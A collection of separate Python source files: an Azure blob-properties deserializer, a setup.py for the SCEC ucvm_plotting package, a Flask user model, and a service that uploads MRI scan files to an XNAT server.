blob.tags = parse_tags(generated.blob_tags) # pylint: disable=protected-access
blob.object_replication_source_properties = deserialize_ors_policies(generated.object_replication_metadata)
blob.last_accessed_on = generated.properties.last_accessed_on
blob.immutability_policy = ImmutabilityPolicy._from_generated(generated) # pylint: disable=protected-access
blob.has_legal_hold = generated.properties.legal_hold
blob.has_versions_only = generated.has_versions_only
return blob
def parse_tags(generated_tags):
# type: (Optional[List[BlobTag]]) -> Union[Dict[str, str], None]
"""Deserialize a list of BlobTag objects into a dict.
"""
if generated_tags:
tag_dict = {t.key: t.value for t in generated_tags.blob_tag_set}
return tag_dict
return None
|
"""
@file setup.py
@brief Build and install the pycvm
@author The SCEC/UCVM Developers - <software@scec.usc.edu>
"""
from setuptools import setup
NAME = "ucvm_plotting"
FULLNAME = "ucvm_plotting with pycvm"
AUTHOR = "The SCEC/UCVM Developers"
AUTHOR_EMAIL = "software@scec.usc.edu"
MAINTAINER = AUTHOR
MAINTAINER_EMAIL = AUTHOR_EMAIL
LICENSE = "Apache 2.0 license"
URL = "https://github.com/SCEC/ucvm_plotting"
DESCRIPTION = "Python code extensions for UCVM and plotting library for the SCEC UCVM"
with open("README.md") as f:
LONG_DESCRIPTION = "".join(f.readlines())
VERSION = "0.0.2"
CLASSIFIERS = [
"Development Status :: 1 - Alpha",
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Topic :: Scientific/Engineering",
"Topic :: Software Development :: Libraries",
"Programming Language :: Python :: 2.7",
"License :: OSI Approved :: {}".format(LICENSE),
]
PLATFORMS = "Any"
INSTALL_REQUIRES = ["numpy", "matplotlib", "basemap", "packaging"]
KEYWORDS = ["UCVM"]
if __name__ == "__main__":
setup(
name=NAME,
fullname=FULLNAME,
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
version=VERSION,
author=AUTHOR,
author_email=AUTHOR_EMAIL,
maintainer=MAINTAINER,
maintainer_email=MAINTAINER_EMAIL,
license=LICENSE,
url=URL,
platforms=PLATFORMS,
classifiers=CLASSIFIERS,
keywords=KEYWORDS,
install_requires=INSTALL_REQUIRES,
packages=["pycvm"],
scripts=["ucvm_plotting/make_map_grid.py","ucvm_plotting/plot_compare_plot.py",
"ucvm_plotting/plot_cross_section.py","ucvm_plotting/plot_density_plot.py",
"ucvm_plotting/plot_depth_profile.py","ucvm_plotting/plot_elevation_cross_section.py",
"ucvm_plotting/plot_elevation_horizontal_slice.py","ucvm_plotting/plot_elevation_map.py",
"ucvm_plotting/plot_elevation_profile.py","ucvm_plotting/plot_horizontal_slice.py",
"ucvm_plotting/plot_scatter_plot.py","ucvm_plotting/plot_vs30_etree_map.py",
"ucvm_plotting/plot_vs30_map.py","ucvm_plotting/plot_z10_map.py",
"ucvm_plotting/plot_z25_map.py",
"utilities/makegrid.sh","utilities/view_png.py"]
)
|
from flask_login import UserMixin
from . import db
#run the creat_all() command to create the database
class User(UserMixin, db.Model):
id = db.Column(db.Integer, primary_key=True)
last_name = db.Column(db.String(100))
first_name = db.Column(db.String(100))
email = db.Column(db.String(100), unique=True)
password = db.Column(db.String(100))
|
# -*- coding: utf-8 -*-
"""Scan service.
This module implements uploading a scan file to XNAT and adding a scan to the database.
Todo: Maybe the public method should be called add, and that should kick off an upload procedure, rather than the
other way around.
Todo: do we want to infer file type from extension? Or use some other method?
Todo: Right now if we use the import service XNAT is inferring its own scan id. What do we want to do about that?
Todo: if someone uploads a zip file we don't actually know that there are dicoms inside (could be NIFTI). Consider this
fact.
Todo: Upload security for zip files?
"""
import os
from cookiecutter_mbam.xnat import XNATConnection
from cookiecutter_mbam.experiment import Experiment
from cookiecutter_mbam.user import User
from .models import Scan
from .utils import gzip_file
from flask import current_app
def debug():
assert current_app.debug == False, "Don't panic! You're here by request of debug()"
class ScanService:
def __init__(self, user_id, exp_id):
self.user_id = user_id
self.user = User.get_by_id(self.user_id)
self.experiment = Experiment.get_by_id(exp_id)
self.xc = XNATConnection()
# todo: what is the actual URI of the experiment I've created? Why does it have the XNAT prefix?
# maybe that's the accessor? Is the accessor in the URI?
def upload(self, image_file):
"""The top level public method for adding a scan
Calls methods to infer file type and further process the file, generate xnat identifiers and query strings,
check what XNAT identifiers objects have, upload the scan to XNAT, add the scan to the database, and update
user, experiment, and scan database objects with their XNAT-related attributes.
:param file object image_file: the file object
:return: None
"""
file, dcm = self._process_file(image_file)
xnat_ids = self._generate_xnat_identifiers(dcm=dcm)
existing_attributes = self._check_for_existing_xnat_ids()
uris = self.xc.upload_scan(xnat_ids, existing_attributes, image_file, import_service=dcm)
scan = self._add_scan()
keywords = ['subject', 'experiment', 'scan']
self._update_database_objects(keywords=keywords, objects=[self.user, self.experiment, scan],
ids=['{}_id'.format(xnat_ids[kw]['xnat_id']) for kw in keywords], uris=uris)
def _add_scan(self):
"""Add a scan to the database
Creates the scan object, adds it to the database, and increments the parent experiment's scan count
:return: scan
"""
scan = Scan.create(experiment_id=self.experiment.id)
self.experiment.num_scans += 1
return scan
def _process_file(self, image_file):
"""Infer file type from extension and respond to file type as necessary
Uses file extension to infer whether file should be left alone or gzipped, or whether zip file will be sent to
import service.
:param file object image_file: the file object
:return: a two-tuple of the image file, and a boolean indicating the file type is dcm
:rtype: tuple
"""
image_file_name = image_file.filename
file_name, file_ext = os.path.splitext(image_file_name)
dcm = False
if file_ext == '.nii':
image_file = (gzip_file(image_file, file_name))
if file_ext == '.zip':
dcm = True
return (image_file, dcm)
def _generate_xnat_identifiers(self, dcm=False):
"""Generate object ids for use in XNAT
Creates a dictionary with keys for type of XNAT object, including subject, experiment, scan, resource and file.
The values in the dictionary are dictionaries with keys 'xnat_id' and, optionally, 'query_string'. 'xnat_id'
points to the identifier of the object in XNAT, and 'query_string' to the query that will be used in the put
request to create the object.
:return: xnat_id dictionary
:rtype: dict
"""
xnat_ids = {}
xnat_ids['subject'] = {'xnat_id': str(self.user_id).zfill(6)}
xnat_exp_id = '{}_MR{}'.format(xnat_ids['subject']['xnat_id'], self.user.num_experiments)
exp_date = self.experiment.date.strftime('%m/%d/%Y')
xnat_ids['experiment'] = {'xnat_id': xnat_exp_id, 'query_string':'?xnat:mrSessionData/date={}'.format(exp_date)}
scan_number = self.experiment.num_scans + 1
xnat_scan_id = 'T1_{}'.format(scan_number)
xnat_ids['scan'] = {'xnat_id':xnat_scan_id, 'query_string':'?xsiType=xnat:mrScanData'}
if dcm:
resource = 'DICOM'
else:
resource = 'NIFTI'
xnat_ids['resource'] = {'xnat_id': resource}
xnat_ids['file'] = {'xnat_id':'T1.nii.gz', 'query_string':'?xsi:type=xnat:mrScanData'}
return xnat_ids
def _check_for_existing_xnat_ids(self):
"""Check for existing attributes on the user and experiment
Generates a dictionary with current xnat_subject_id for the user, xnat_experiment_id for the experiment as
values if they exist (empty string if they do not exist). A private method not designed to be accessed by other
classes.
:return: a dictionary with two keys with the xnat subject id and xnat experiment id.
:rtype: dict
"""
return {k: getattr(v, k) if getattr(v, k) else '' for k, v in {'xnat_subject_id': self.user,
'xnat_experiment_id': self.experiment}.items()}
# todo: the check for existence before reassigning the values is verbose. Decide whether its important.
def _update_database_objects(self, objects=[], keywords=[], uris=[], ids=[],):
"""Update database objects
After uploading a scan, ensures that user, experient, and scan are updated in the database with their xnat uri
and xnat id.
:param list objects: user, experiment, and scan
:param list keywords: 'subject', 'experiment', and 'scan'
:param list uris: xnat uris
:param list ids: xnat ids
:return: None
"""
attributes = zip(objects, keywords, uris, ids)
for (obj, kw, uri, id) in attributes:
if not hasattr(obj, 'xnat_uri'):
obj.update({'xnat_uri': uri})
if not hasattr(obj,'xnat_{}_id'.format(kw)):
obj.update({'xnat_{}_id'.format(kw): id})
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.